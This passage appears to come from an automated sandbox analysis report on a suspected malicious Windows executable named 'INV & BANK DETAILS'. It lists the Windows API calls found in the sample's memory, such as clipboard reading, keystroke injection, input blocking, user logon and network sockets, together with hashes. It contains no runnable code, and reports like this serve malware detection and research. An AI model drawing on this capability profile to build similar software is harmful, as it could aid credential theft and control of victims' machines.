                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID: pqI
                                • API String ID: 2579439406-2459173057
                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                APIs
                                • __wcsicoll.LIBCMT ref: 00433349
                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                • __wcsicoll.LIBCMT ref: 00433375
                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsicollmouse_event
                                • String ID: DOWN
                                • API String ID: 1033544147-711622031
                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                APIs
                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: KeyboardMessagePostState$InputSend
                                • String ID:
                                • API String ID: 3031425849-0
                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                APIs
                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorLastinet_addrsocket
                                • String ID:
                                • API String ID: 4170576061-0
                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                APIs
                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                • IsWindowVisible.USER32 ref: 0047A368
                                • IsWindowEnabled.USER32 ref: 0047A378
                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                • IsIconic.USER32 ref: 0047A393
                                • IsZoomed.USER32 ref: 0047A3A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                • String ID:
                                • API String ID: 292994002-0
                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                APIs
                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                • CoInitialize.OLE32(00000000), ref: 00478442
                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                • CoUninitialize.OLE32 ref: 0047863C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                • String ID: .lnk
                                • API String ID: 886957087-24824748
                                • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                APIs
                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                • CloseClipboard.USER32 ref: 0046DD0D
                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                • CloseClipboard.USER32 ref: 0046DD41
                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                • CloseClipboard.USER32 ref: 0046DD99
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                • String ID:
                                • API String ID: 15083398-0
                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: U$\
                                • API String ID: 4104443479-100911408
                                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Find$File$CloseFirstNext
                                • String ID:
                                • API String ID: 3541575487-0
                                • Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                • Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                APIs
                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                • String ID:
                                • API String ID: 901099227-0
                                • Opcode ID: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                • Opcode Fuzzy Hash: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                APIs
                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Proc
                                • String ID:
                                • API String ID: 2346855178-0
                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                APIs
                                • BlockInput.USER32(00000001), ref: 0045A38B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                APIs
                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: LogonUser
                                • String ID:
                                • API String ID: 1244722697-0
                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                APIs
                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID: N@
                                • API String ID: 0-1509896676
                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
